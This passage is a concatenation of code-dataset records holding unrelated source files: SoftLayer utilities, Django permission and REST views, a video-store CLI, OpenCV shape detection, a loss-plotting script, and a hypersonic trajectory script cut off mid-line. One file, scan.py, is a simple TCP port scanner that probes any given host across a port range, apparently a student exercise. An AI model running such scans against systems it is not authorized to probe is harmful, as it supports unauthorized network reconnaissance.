Name'])\n\nprint(COUNTRIES)\n","sub_path":"ProjectII_Py/tryit_16_5.py","file_name":"tryit_16_5.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"349901321","text":"\"\"\"\n SoftLayer.utils\n ~~~~~~~~~~~~~~~\n 
Utility function/classes\n\n :license: MIT, see LICENSE for more details.\n\"\"\"\nimport re\nimport six\n\nUUID_RE = re.compile('^[0-9a-f\\-]{36}$', re.I)\nKNOWN_OPERATIONS = ['<=', '>=', '<', '>', '~', '!~', '*=', '^=', '$=', '_=']\n\nconfigparser = six.moves.configparser # pylint: disable=E1101\nconsole_input = six.moves.input # pylint: disable=E1101\nstring_types = six.string_types\nStringIO = six.StringIO\n\n\n# Code from http://stackoverflow.com/questions/11700798/python-accessing-values-nested-within-dictionaries # NOQA\ndef lookup(dic, key, *keys):\n if keys:\n return lookup(dic.get(key, {}), *keys)\n return dic.get(key)\n\n\nclass NestedDict(dict):\n\n def __getitem__(self, key):\n if key in self:\n return self.get(key)\n return self.setdefault(key, NestedDict())\n\n def to_dict(self):\n d = {}\n for k, v in self.items():\n if isinstance(v, NestedDict):\n d[k] = v.to_dict()\n else:\n d[k] = v\n return d\n\n\ndef query_filter(query):\n \"\"\" Translate a query-style string to a 'filter'. Query can be the\n following formats:\n\n Case Insensitive\n 'value' OR '*= value' Contains\n 'value*' OR '^= value' Begins with value\n '*value' OR '$= value' Ends with value\n '*value*' OR '_= value' Contains value\n\n Case Sensitive\n '~ value' Contains\n '!~ value' Does not contain\n '> value' Greater than value\n '< value' Less than value\n '>= value' Greater than or equal to value\n '<= value' Less than or equal to value\n\n :param string query: query string\n\n \"\"\"\n try:\n return {'operation': int(query)}\n except ValueError:\n pass\n\n if isinstance(query, string_types):\n query = query.strip()\n for op in KNOWN_OPERATIONS:\n if query.startswith(op):\n query = \"%s %s\" % (op, query[len(op):].strip())\n return {'operation': query}\n if query.startswith('*') and query.endswith('*'):\n query = \"*= %s\" % query.strip('*')\n elif query.startswith('*'):\n query = \"$= %s\" % query.strip('*')\n elif query.endswith('*'):\n query = \"^= %s\" % query.strip('*')\n else:\n query = \"_= %s\" % query\n\n return {'operation': query}\n\n\nclass IdentifierMixin(object):\n \"\"\" This mixin provides an interface to provide multiple methods for\n converting an 'indentifier' to an id \"\"\"\n resolvers = []\n\n def resolve_ids(self, identifier):\n \"\"\" Takes a string and tries to resolve to a list of matching ids. 
What\n exactly 'identifier' can be depends on the resolvers\n\n :param string identifier: identifying string\n\n :returns list:\n \"\"\"\n\n return resolve_ids(identifier, self.resolvers)\n\n\ndef resolve_ids(identifier, resolvers):\n \"\"\" Resolves IDs given a list of functions\n\n :param string identifier: identifier string\n :param list resolvers: a list of functions\n :returns list:\n \"\"\"\n\n # Before doing anything, let's see if this is an integer\n try:\n return [int(identifier)]\n except ValueError:\n pass # It was worth a shot\n\n # This looks like a globalIdentifier (UUID)\n if len(identifier) == 36 and UUID_RE.match(identifier):\n return [identifier]\n\n for resolver in resolvers:\n ids = resolver(identifier)\n if ids:\n return ids\n\n return []\n","sub_path":"SoftLayer/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"203385405","text":"import getopt,socket,sys,re\n\nclass Scan:\n def __init__(self,args):\n self._getargs(args)\n def _getargs(self,args):\n opt = dict(getopt.getopt(args,'',['host=','port='])[0])\n host = opt.get('--host')\n host_match = re.match('\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}',host)\n if not host_match:\n print('Parameter Error')\n sys.exit(-1)\n self.host = host\n port_str = opt.get('--port')\n port_l = port_str.split('-')\n port = []\n\n for i in port_l:\n if not i.isdigit():\n print('Parameter Error')\n sys.exit(-1)\n if len(port_l) == 1:\n port.append(int(port_l[0]))\n elif len(port_l) == 2:\n port = [ i for i in range(int(port_l[0]),int(port_l[1])+1)]\n\n self.port = port\n\n def start(self):\n for i in self.port:\n addr = (self.host,i)\n sk = socket.socket()\n ret = sk.connect_ex(addr)\n if ret:\n print('{} closed'.format(i))\n else:\n print('{} open'.format(i))\nif __name__ == '__main__':\n scan = Scan(sys.argv[1:])\n scan.start()\n\n\n\n","sub_path":"challenge7/scan.py","file_name":"scan.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"589344743","text":"#! 
/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# __author__ = \"Q1mi\"\r\n# Email: master@liwenzhou.com\r\n\r\n\"\"\"\r\nPermission control helpers\r\n\"\"\"\r\n\r\nfrom django.shortcuts import render, HttpResponse, Http404, redirect\r\nfrom django.core.urlresolvers import resolve\r\nfrom django.contrib.auth.models import User, Group\r\n\r\n\r\n# Define the role groups; each group only has permissions on the listed models\r\nrole_groups = {\r\n\t\"salesman\": [\"Customer\", \"ConsultRecord\"],\r\n\t\"teachers\": [\"Course\", \"ClassList\", \"CourseRecord\", \"StudyRecord\"],\r\n\t\"students\": [\"StudyRecord\"],\r\n}\r\n\r\n# Mapping between permissions and actions\r\npermission_dic = {\r\n\t\"view_index\": [\"crm_index\", \"GET\", []], # view the index page\r\n\t\"view_record_details\": [\"model_detail\", \"GET\", []], # view record details\r\n\t\"change_record_details\": [\"change_model_detail\", \"POST\", []], # change record details\r\n\t\"add_record\": [\"add_model_detail\", \"POST\", []], # add a record\r\n\t\"delete_record\": [\"delete_model\", \"POST\", []] # delete a record\r\n}\r\n\r\n\r\n# Perform the permission check\r\ndef permission_check(*args, **kwargs):\r\n\trequest = args[0] # by convention the first argument is the request\r\n\tprint(request.user.get_group_permissions()) # the group permissions of the user\r\n\tuser = request.user\r\n\tuser_groups = Group.objects.get(user=user) # get the user's group\r\n\tprint(user_groups)\r\n\tprint(\"=\" * 50)\r\n\turl_resolve_obj = resolve(request.path_info) # resolve the request into a url object\r\n\tcurrent_url_namespace = url_resolve_obj.url_name # extract the url info we need\r\n\tprint(url_resolve_obj.kwargs) # url parameters\r\n\turl_kwargs = url_resolve_obj.kwargs\r\n\r\n\tif len(url_kwargs) > 0:\r\n\t\tif url_kwargs.get(\"model_name_str\", None) and url_kwargs.get(\"model_name_str\") not in role_groups.get(str(user_groups), []):\r\n\t\t\tprint(\"{} has no permission to operate on table {}.\".format(user, url_kwargs.get(\"model_name_str\")))\r\n\t\t\treturn False\r\n\r\n\tprint(\"Got url namespace: {}\".format(current_url_namespace))\r\n\tmatch_flag = False # whether a matching action was found\r\n\tmatch_perm_key = None # permission key of the matched action\r\n\tif current_url_namespace:\r\n\t\tprint(\"Start matching actions...\")\r\n\t\tfor permission_key in permission_dic:\r\n\t\t\tpermission_value = permission_dic[permission_key]\r\n\t\t\tif len(permission_value) == 3: # check that this is a valid permission/action definition\r\n\t\t\t\turl_namespace, request_method, request_args = permission_value\r\n\t\t\t\tprint(url_namespace, request_method, request_args)\r\n\t\t\t\tif url_namespace == current_url_namespace: # the url matches\r\n\t\t\t\t\tif request_method == request.method: # the request method matches\r\n\t\t\t\t\t\tif not request_args: # no action parameters required\r\n\t\t\t\t\t\t\tmatch_flag = True # matched\r\n\t\t\t\t\t\t\tmatch_perm_key = permission_key # permission key for this request action\r\n\t\t\t\t\t\t\tprint(\"{} matched {}\".format(request, permission_key))\r\n\t\t\t\t\t\t\tbreak # stop after the first matching action\r\n\t\t\t\t\t\telse: # match the action parameters\r\n\t\t\t\t\t\t\trequest_method_func = getattr(request, request_method) # request.GET or request.POST\r\n\t\t\t\t\t\t\tif all(map(request_method_func.get, request_args)): # the request carries every value the action requires\r\n\t\t\t\t\t\t\t\tmatch_flag = True # matched\r\n\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\tmatch_flag = False\r\n\t\t\t\t\t\t\t\tbreak\r\n\telse: # no url info extracted\r\n\t\tprint(request.path_info)\r\n\t\treturn True\r\n\tif match_flag:\r\n\t\tperm_str = \"{}.{}\".format(__package__, match_perm_key)\r\n\t\tif request.user.has_perm(perm_str): # use Django's built-in permission check on the requesting user\r\n\t\t\tprint(\"Permission check passed...\")\r\n\t\t\treturn True\r\n\t\telse:\r\n\t\t\tprint(\"Permission check failed...\")\r\n\t\t\tprint(request.user, perm_str)\r\n\t\t\treturn False\r\n\r\n\r\ndef check_permission(func, redict_url=\"/crm/\"):\r\n\tdef wrapper(*args, **kwargs):\r\n\t\tprint(\"Starting permission check!\")\r\n\t\tif permission_check(*args, **kwargs) is not True:\r\n\t\t\treturn 
render(args[0], \"crm/403.html\")\r\n\t\treturn func(*args, **kwargs)\r\n\treturn wrapper\r\n","sub_path":"day19/homework/zz/crm/permissions.py","file_name":"permissions.py","file_ext":"py","file_size_in_byte":3771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"180902514","text":"import requests\nfrom video_store import Video_store\n\n#URL = \"http://localhost:5000\"\nURL = \"https://retro-video-store-api.herokuapp.com\"\n\ndef main():\n print(u\"\\u001b[34;1mWELCOME TO BRICKBUSTER\\u001b[0m\")\n #pass\n\n\nif __name__ == \"__main__\":\n main()\n\ndef print_stars():\n \n print(\"______________________________________________________________________\")\n print(u\"\\u001b[41m___|___|___|___|___|___|___|___|___|___|___|___|___|___|___|___|___|__\")\n print(\"_|___|___|___|___|___|___|___|___|___|___|___|___|___|___|___|___|___|\")\n print(\"___|___|___|___|___|___|___|___|___|___|___|___|___|___|___|___|___|__\")\n print(\"_|___|___|___|___|___|___|___|___|___|___|___|___|___|___|___|___|___|\\u001b[0m\")\n \n \ndef houston_we():\n print(\" _______ \")\n print(\" _________ .----'''' ''''----. \")\n print(\" :______.-': : .-----------------. : \")\n print(\" | ______ | | : : | \")\n print(\" |:______B:| | | Little Error: | | \")\n print(\" |:______B:| | | | | \")\n print(\" |:______B:| | | Item not | | \")\n print(\" | | | | found. | | \")\n print(\" |:_____: | | | | | \")\n print(\" | == | | : : | \")\n print(\" | O | : '-----------------' : \")\n print(\" | o | :'-----...______...-----' \")\n print(\" | o |-._.-i_____/' \\._ \")\n print(\" |'-.____o_| '-. '-...______...-' `-._ \")\n print(\" :_________: `.____________________ `-.___.-. \")\n print(\" .'.eeeeeeeeeeeeeeeeee.'. :___: \")\n print(\" fsc .'.eeeeeeeeeeeeeeeeeeeeee.'. \")\n print(\" :____________________________: \")\n\n\ndef list_options():\n options = {\n \"1\": \"List all videos in stock\", \n \"2\": \"Create a new video record\",\n \"3\": \"Select a video\", \n \"4\": \"Update selected video\", \n \"5\": \"Delete selected video\", \n \"6\": \"Delete all videos in stock\",\n \"7\": \"List all options\",\n \"8\": \"Quit\",\n \"9\": \"Rent out a video\",\n \"10\": \"Return a video\",\n \"11\": \"List all customers\", \n \"12\": \"Add a new customer\",\n \"13\": \"Update selected customer\", \n \"14\": \"Delete selected customer\",\n \"15\": \"Select a customer\"\n }\n\n print_stars()\n print(u\"\\u001b[34m Good to see You\")\n print(\" These are the actions you can perform\\u001b[0m\")\n print_stars()\n #houston_we()\n \n for choice_num in options:\n print(f\"\\u001b[34mOption {choice_num}. {options[choice_num]}\\u001b[0m\")\n\n print_stars()\n\n return options\n\ndef make_choice(options, video_store):\n valid_choices = options.keys()\n choice = None\n\n while choice not in valid_choices:\n print(\"What would you like to do? 
Select 7 to see all options again\")\n choice = input(\"Make your selection using the option number: \")\n\n if choice in ['4','5'] and video_store.selected_video == None:\n print(\"You must select a video before updating or deleting it\")\n print(\"Let's select a video!\")\n choice = \"3\"\n\n elif choice in ['13', '14'] and video_store.selected_customer == None:\n print(\"You must select a customer before updating or deleting it\")\n print(\"Let's select a customer!\")\n choice = \"15\"\n\n return choice\n\ndef run_cli(play=True):\n\n video_store = Video_store(URL)\n \n options = list_options()\n\n while play==True:\n\n \n choice = make_choice(options, video_store)\n\n if choice=='1':\n print_stars()\n for video in video_store.list_videos():\n print(video)\n\n elif choice=='2':\n print(\"Great! Let's create a new video.\")\n title=input(\"What is the name of the video? \")\n release_date=input(\"When was this movie released?\")\n total_inventory=input(\"How many copies of this video are we adding?\")\n response = video_store.create_video(title=title, release_date=release_date, total_inventory= total_inventory)\n\n print_stars()\n print(\"New video:\", response)\n\n elif choice=='3':\n select_by = input(\"Would you like to select by? Enter title or id: \")\n if select_by==\"title\":\n title = input(\"Which title would you like to select? \")\n video_store.get_video(title=title)\n elif select_by==\"id\":\n video_id = input(\"Which video id would you like to select? \")\n if video_id.isnumeric():\n video_id = int(video_id)\n video_store.get_video(video_id=video_id)\n else:\n print(\"Could not select. Please enter id or title.\")\n \n if video_store.selected_video:\n print_stars()\n print(\"Selected video: \", video_store.selected_video)\n \n elif choice=='4':\n print(f\"Great! Let's update the movie: {video_store.selected_video}\")\n title=input(\"What is the title of your new video? \")\n release_date=input(\"When was it released?\")\n total_inventory=input(\"How many copies do you have available to add to stock?\")\n response = video_store.update_video(title=title, release_date=release_date, total_inventory=total_inventory)\n\n print_stars()\n print(\"video:\", response)\n\n elif choice=='5':\n video_store.delete_video()\n\n print_stars()\n print(\"Movie has been deleted.\")\n\n print_stars()\n\n elif choice=='6':\n for video in video_store.list_videos():\n video_store.get_video(video_id=video['id'])\n video_store.delete_video()\n\n print_stars()\n print(\"Deleted all videos in stock. Out with the old.\")\n\n elif choice=='7':\n list_options()\n\n elif choice=='8':\n play=False\n print(\"\\nThanks!\")\n\n elif choice =='9':\n customer_id = input(\"Which customer is renting today? (please provide customer id)\")\n video_id = input(\"Which video would they like to rent? (please provide video id)\" )\n response = video_store.check_out_video(int(customer_id), int(video_id))\n if response != 200:\n houston_we()\n print(response) \n print_stars()\n\n elif choice =='10':\n customer_id = input(\"Which customer is returning today? (please provide customer id)\")\n video_id = input(\"Which video are they returning? (please provide video id)\")\n response = video_store.check_in_video(int(customer_id), int(video_id))\n print(response) \n print_stars()\n\n \n elif choice =='11':\n print_stars()\n for customer in video_store.list_customers():\n print(customer)\n \n elif choice =='12':\n print(\"Great! 
Let's add a new customer.\")\n name=input(\"What is the name of customer?\")\n phone=input(\"Please add customer's phone number ->\")\n postal_code=input(\"Please add customer's postal code ->\")\n response = video_store.create_customer(name=name, phone=phone, postal_code= postal_code)\n\n print_stars()\n print(\"New customer:\", response)\n \n elif choice =='13':\n print(f\"Great! Let's update the customer {video_store.selected_customer}'s record\")\n name=input(\"What is the new name of customer?\")\n phone=input(\"Please add customer's new phone number ->\")\n postal_code=input(\"Please add customer's new postal code ->\")\n response = video_store.update_customer(name=name, phone=phone, postal_code= postal_code)\n\n print_stars()\n print(\"Customer:\", response)\n \n elif choice == '14':\n video_store.delete_customer()\n\n print_stars()\n print(\"Customer has been deleted.\")\n\n print_stars()\n\n elif choice == '15':\n select_by = input(\"Would you like to select your cutomer by? Enter name or id: \")\n if select_by==\"name\":\n title = input(\"Which customer would you like to select by name? \")\n video_store.get_customer(customer=customer)\n elif select_by==\"id\":\n customer_id = input(\"Which customer id would you like to select? \")\n if customer_id.isnumeric():\n customer_id = int(customer_id)\n video_store.get_customer(customer_id=customer_id)\n else:\n print(\"Could not select. Please enter id or name.\")\n \n if video_store.selected_customer:\n print_stars()\n print(\"Selected customer: \", video_store.selected_customer)\n\n print_stars()\n\n\nrun_cli()\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"600176480","text":"\nfrom shapelabeler import ShapeDetector\nfrom colorlabeler import ColorLabeler\n\nimport cv2\nimport imutils\nimport numpy as np\nimport matplotlib.pyplot as plt\t\n\nimg = cv2.imread('../cropping/test6.jpg')\nnum_rows, num_cols = img.shape[:2]\nhorizontal_img = cv2.flip( img, 0 )\n\n\n# If we need to rotate the image\n# rotation_matrix = cv2.getRotationMatrix2D((num_cols/2, num_rows/2), 180, 1)\n# img = cv2.warpAffine(img, rotation_matrix, (num_cols, num_rows))\n\n# cropped = img[40:1040, 140:1780]\n# cv2.imshow(\"cropped\", cropped)\n\nresized = imutils.resize(img, width=1200)\nratio = resized.shape[0] / float(img.shape[0])\n\n#Convert white background to black\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n(thresh, baw) = cv2.threshold(gray, 128, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)\nwab = cv2.bitwise_not(baw)\nwabrgb = cv2.cvtColor(wab,cv2.COLOR_GRAY2RGB)\nnoBackground = cv2.bitwise_and(img, wabrgb)\n\nlab = cv2.cvtColor(noBackground, cv2.COLOR_BGR2LAB)\nblurred_3 = cv2.GaussianBlur(noBackground, (1, 1), 0)\ngray_3 = cv2.cvtColor(blurred_3, cv2.COLOR_BGR2GRAY)\nthresh_3 = cv2.threshold(gray_3, 30, 255, cv2.THRESH_BINARY)[1]\n\ncnts = cv2.findContours(thresh_3.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\ncnts = cnts[0] if imutils.is_cv2() else cnts[1]\n\n#Initialize classes\nsd = ShapeDetector()\ncl = ColorLabeler()\ncontours = []\n\nfor c in cnts:\n\tshape = sd.detect(c, 3)\n\tif shape != \"\":\n\t\tcolor = cl.label(lab, c)\n\t\tx,y,w,h = cv2.boundingRect(c)\n\t\tcX = x+w/2\n\t\tcY = y+h/2\n\t\tcontours.append([cX, cY, shape, color])\n\t\t\nrow = []\ncenters = []\nrowMin = contours[0][1]-10\nrowMax = contours[0][1]+10\n\nfor c in contours:\n\tcX, cY, shape, color = c\n\tif rowMin <= cY and cY <= 
rowMax:\n\t\trow.append([cX, cY, shape+' '+color+', '])\n\telse:\n\t\trow.sort(reverse=False)\n\t\tcenters.append(row)\n\t\trow = [[cX, cY, shape+' '+color+', ']]\n\t\trowMin = cY-10\n\t\trowMax = cY+10\n\n# Here need to format the array for the decoder file\n","sub_path":"final_cv.py","file_name":"final_cv.py","file_ext":"py","file_size_in_byte":1899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"539834441","text":"import matplotlib.pyplot as plt\r\nimport numpy as np\r\nfrom data_load import get_data\r\nfrom model import skrnn_loss\r\nfrom eval_skrnn import load_pretrained_congen, load_pretrained_uncond\r\nimport torch\r\n\r\ndata_types = ['cat', 'cake']\r\nweights = [0.25, 0.5, 1.0]\r\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\r\nbatch_size=50\r\n\r\nlosses = np.zeros((len(data_types), len(weights),4))\r\n\r\nfor i, data_type in enumerate(data_types):\r\n data_enc, data_dec, max_seq_len = get_data(data_type = data_type, max_len=200, train_mode='test')\r\n num_mini_batch = len(data_dec) - (len(data_dec) % batch_size)\r\n\r\n for j, weight_kl in enumerate(weights):\r\n\r\n sum_ltot, sum_lr, sum_lkl = 0.0, 0.0, 0.0 \r\n encoder, decoder, hid_dim, latent_dim, cond_gen, mode, device = load_pretrained_congen(data_type, weight_kl) \r\n \r\n for batch_id in range(0, num_mini_batch, batch_size):\r\n hidden_enc = hidden_dec = encoder.initHidden()\r\n \r\n inp_enc = torch.tensor(data_enc[batch_id:batch_id+batch_size], dtype=torch.float, device=device)\r\n inp_dec = torch.tensor(data_dec[batch_id:batch_id+batch_size], dtype=torch.float, device=device)\r\n \r\n z, hidden_dec, mu, sigma = encoder(inp_enc, hidden_enc) \r\n gmm_params, _ = decoder(inp_dec, z, hidden_dec)\r\n \r\n loss_lr, loss_kl = skrnn_loss(gmm_params, [mu,sigma], inp_dec[:,1:,], device=device)\r\n sum_ltot += (loss_lr + weight_kl*loss_kl).cpu().detach().numpy()\r\n sum_lr += loss_lr.cpu().detach().numpy()\r\n sum_lkl += loss_kl.cpu().detach().numpy()\r\n \r\n losses[i,j,0] = sum_ltot/num_mini_batch\r\n losses[i,j,1] = sum_lr/num_mini_batch\r\n losses[i,j,2] = sum_lkl/num_mini_batch\r\n\r\n\r\nfor i, data_type in enumerate(data_types):\r\n data_enc, data_dec, max_seq_len = get_data(data_type = data_type, max_len=200, train_mode='test')\r\n num_mini_batch = len(data_dec) - (len(data_dec) % batch_size)\r\n weight_kl = 0.0\r\n \r\n sum_ltot, sum_lr, sum_lkl = 0.0, 0.0, 0.0 \r\n encoder, decoder, hidden_size, latent_dim, cond_gen, mode, device = load_pretrained_uncond(data_type) \r\n\r\n for batch_id in range(0, num_mini_batch, batch_size):\r\n hidden_dec = (torch.zeros(1, 50, hidden_size, device=device), torch.zeros(1, 50, hidden_size, device=device))\r\n\r\n z = torch.zeros(50, latent_dim, device=device)\r\n\r\n gmm_params, _ = decoder(inp_dec, z, hidden_dec)\r\n \r\n loss_lr, loss_kl = skrnn_loss(gmm_params, [mu,sigma], inp_dec[:,1:,], device=device)\r\n sum_ltot += (loss_lr + weight_kl*loss_kl).cpu().detach().numpy()\r\n sum_lr += loss_lr.cpu().detach().numpy()\r\n sum_lkl += loss_kl.cpu().detach().numpy()\r\n\r\n losses[i,:,3] = sum_ltot/num_mini_batch\r\n\r\n\r\nfig, ax = plt.subplots(2,2, figsize = (15,15))\r\n\r\nax[0,0].plot(weights, losses[0,:,0], color = 'orange', marker = '+')\r\nax[0,0].axhline(losses[0,0,3], color = 'orange', linestyle = '--')\r\nax[0,0].plot(weights, losses[1,:,0], color = 'blue', marker = '+')\r\nax[0,0].axhline(losses[1,0,3], color = 'blue', linestyle = '--')\r\nax[0,0].legend([\"Cat cond\", \"Cat uncond\", \"Cake 
cond\", \"Cake uncond\"])\r\nax[0,0].set_xlabel('Weight KL')\r\nax[0,0].set_ylabel('LR + LKL')\r\n\r\n\r\nax[0,1].plot(weights, losses[0,:,1], color = \"orange\", marker = '+')\r\nax[0,1].axhline(losses[0,0,3], color = 'orange', linestyle = '--')\r\nax[0,1].plot(weights, losses[1,:,1], color = \"blue\", marker = '+')\r\nax[0,1].axhline(losses[1,0,3], color = 'blue', linestyle = '--')\r\nax[0,1].legend([\"Cat cond\", \"Cat uncond\", \"Cake cond\", \"Cake uncond\"])\r\nax[0,1].set_xlabel('Weight KL')\r\nax[0,1].set_ylabel('LR')\r\n\r\nax[1,0].plot(weights, losses[0,:,2], color = 'orange', marker = '+')\r\nax[1,0].plot(weights, losses[1,:,2], color = 'blue', marker = '+')\r\nax[1,0].legend([\"Cat cond\", \"Cake cond\"])\r\nax[1,0].set_xlabel('Weight KL')\r\nax[1,0].set_ylabel('LKL')\r\n\r\nax[1,1].plot(weights, losses[0,:,1], color = 'orange', marker = '+')\r\nax[1,1].axhline(losses[0,0,3], color = 'orange', linestyle = '--')\r\nax[1,1].plot(weights, losses[1,:,2], color = 'blue', marker = '+')\r\nax[1,1].axhline(losses[1,0,3], color = 'blue', linestyle = '--')\r\nax[1,1].legend([\"Cat cond\", \"Cat uncond\", \"Cake cond\", \"Cake uncond\"])\r\nax[1,1].set_xlabel('LKL')\r\nax[1,1].set_ylabel('LR')\r\n\r\nplt.savefig(\"plot_loss.png\")\r\nplt.show()\r\n","sub_path":"sketch_generation/plot_loss.py","file_name":"plot_loss.py","file_ext":"py","file_size_in_byte":4406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"589391123","text":"from .models import Movie, Person, Role\nfrom .serializer import MovieSerializer, PersonSerializer\nfrom django.http import Http404\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.shortcuts import render, redirect\nfrom django.utils.decorators import method_decorator\nfrom django.views import View\nfrom rest_framework import status\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\n# Create your views here.\nclass MenuView(View):\n\n def get(self, request):\n return render(request, 'movies/menu.html')\n\nclass MoviesListView(APIView):\n\n def get(self, request, format=None):\n movies_list = Movie.objects.all()\n serializer = MovieSerializer(movies_list, many=True, context={'request': request})\n return Response(serializer.data)\n\n def post(self, request, format=None):\n serializer = MovieSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.data, status=status.HTTP_400_BAD_REQUEST)\n\nclass MovieView(APIView):\n\n def get_object(self, pk):\n try:\n return Movie.objects.get(pk=pk)\n except Movie.DoesNotExist:\n raise Http404\n\n def get(self, request, id, format=None):\n movie = self.get_object(id)\n serializer = MovieSerializer(movie, context={\"request\": request})\n return Response(serializer.data)\n\n def delete(self, request, id, format=None):\n movie = self.get_object(id)\n movie.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n def put(self, request, id, format=None):\n movie = self.get_object(id)\n serializer = MovieSerializer(movie, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def post():\n pass\n\nclass PersonsListView(APIView):\n\n def get(self, request):\n persons_list = Person.objects.all()\n serializer = PersonSerializer(persons_list, many=True, context={'request': request})\n 
return Response(serializer.data)\n\n def post(self, request, format=None):\n serializer = PersonSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.data, status=status.HTTP_400_BAD_REQUEST)\n\nclass PersonView(APIView):\n\n def get_object(self, pk):\n try:\n return Person.objects.get(pk=pk)\n except Person.DoesNotExist:\n raise Http404\n\n def get(self, request, pk, format=None):\n person = self.get_object(pk)\n serializer = PersonSerializer(person, context={'request': request})\n return Response(serializer.data)\n\n def delete(self, request, pk, format=None):\n person = self.get_object(pk)\n person.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n def put(self, request, pk, format=None):\n person = self.get_object(pk)\n serializer = PersonSerializer(person, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n","sub_path":"rest_server/movies/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"638056685","text":"\"\"\"Unconstrained planar hypersonic trajectory problem.\nEntry flight-path angle is constrained so the vehicle enters\nthe atmosphere fairly steep. It performs a skip maneuver to\nreach its target. The first solution is the planar problem,\nwhich is then used as an initial guess into the 4-hypersonic3dof problem.\"\"\"\nfrom math import *\n\nimport beluga\nimport logging\n\n'''\nBegin the planar portion of the solution process.\n'''\nocp = beluga.OCP('planarHypersonic')\n\n# Define independent variables\nocp.independent('t', 's')\n\n\n# Define equations of motion\nocp.state('h','v*sin(gam)','m') \\\n .state('theta','v*cos(gam)/r','rad') \\\n .state('v','-D/mass - mu*sin(gam)/r**2','m/s') \\\n .state('gam','L/(mass*v) + (v/r - mu/(v*r^2))*cos(gam)','rad')\n\n\n# Define quantities used in the problem\nocp.quantity('rho','rho0*exp(-h/H)')\nocp.quantity('Cl','(1.5658*alfa + -0.0000)')\nocp.quantity('Cd','(1.6537*alfa^2 + 0.0612)')\nocp.quantity('D','0.5*rho*v^2*Cd*Aref')\nocp.quantity('L','0.5*rho*v^2*Cl*Aref')\nocp.quantity('r','re+h')\n\n\n\n# Define controls\nocp.control('alfa','rad')\n\n# Define constants\nocp.constant('mu', 3.986e5*1e9, 'm^3/s^2') # Gravitational parameter, m^3/s^2\nocp.constant('rho0', 0.0001*1.2, 'kg/m^3') # Sea-level atmospheric density, kg/m^3\nocp.constant('H', 7500, 'm') # Scale height for atmosphere of Earth, m\nocp.constant('mass',750/2.2046226,'kg') # Mass of vehicle, kg\nocp.constant('re',6378000,'m') # Radius of planet, m\nocp.constant('Aref',pi*(24*.0254/2)**2,'m^2') # Reference area of vehicle, m^2\nocp.constant('h_0', 80000, 'm')\nocp.constant('v_0', 4000, 'm/s')\nocp.constant('gam_0', (-90)*pi/180, 'rad')\nocp.constant('h_f', 80000, 'm')\nocp.constant('theta_f', 0, 'rad')\n\n# Define costs\nocp.terminal_cost('-v^2','m^2/s^2')\n\n# Define constraints\nocp.constraints() \\\n .initial('h-h_0','m') \\\n .initial('theta','rad') \\\n .initial('v-v_0','m/s') \\\n .initial('gam-gam_0','rad') \\\n .terminal('h-h_f','m') \\\n .terminal('theta-theta_f','rad')\n\nocp.scale(m='h', s='h/v', kg='mass', rad=1)\n\nbvp_solver = beluga.bvp_algorithm('Shooting',\n derivative_method='fd',\n tolerance=1e-6,\n max_iterations=100,\n max_error=100,\n algorithm='SLSQP'\n)\n\nguess_maker = 
beluga.guess_generator('auto',\n start=[40000,0,2000,(-90)*pi/180],\n direction='forward',\n costate_guess = -0.1\n)\n\ncontinuation_steps = beluga.init_continuation()\n\n# Start by flying straight towards the ground\ncontinuation_steps.add_step('bisection') \\\n .num_cases(5) \\\n .const('h_f',0)\n\n# Slowly turn up the density\ncontinuation_steps.add_step('bisection') \\\n .num_cases(3) \\\n .const('rho0',1.2)\n\n# Move downrange out a tad\ncontinuation_steps.add_step('bisection') \\\n .num_cases(3) \\\n .const('theta_f',0.01*pi/180)\n\n# Bring flight-path angle up slightly to activate the control\ncontinuation_steps.add_step('bisection') \\\n .num_cases(11) \\\n .const('gam_0', -80*pi/180) \\\n .const('theta_f', 0.5*pi/180)\n\ncontinuation_steps.add_step('bisection') \\\n .num_cases(31) \\\n .const('gam_0', -0*pi/180) \\\n .const('theta_f', 3*pi/180)\n\nbeluga.add_logger(logging_level=logging.DEBUG)\n\nsol = beluga.solve(ocp,\n method='traditional',\n bvp_algorithm=bvp_solver,\n steps=continuation_steps,\n guess_generator=guess_maker)\n\n\n'''\nBegin the 3 dof portion of the solution process.\n'''\nocp_2 = beluga.OCP('hypersonic3DOF')\n\n# Define independent variables\nocp_2.independent('t', 's')\n\nrho = 'rho0*exp(-h/H)'\nCl = 